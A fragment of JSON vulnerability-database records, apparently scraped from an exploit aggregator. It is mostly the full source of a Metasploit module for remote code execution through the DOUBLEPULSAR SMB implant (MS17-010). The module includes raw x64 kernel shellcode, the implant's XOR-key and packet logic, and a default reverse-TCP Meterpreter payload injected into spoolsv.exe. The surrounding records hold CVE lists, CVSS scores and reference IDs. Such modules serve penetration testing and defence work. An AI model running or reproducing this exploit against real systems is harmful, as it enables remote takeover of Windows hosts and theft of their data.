"kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-21T22:27:03", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-10-21T22:27:03", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-22] #"}, "lastseen": "2021-10-21T22:27:03", "differentElements": ["sourceData"], "edition": 51}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "09a3e0d3fb585848b26d4a6ab71d13cf", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-23T14:17:45", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-21T22:27:03", "rev": 2}, "score": 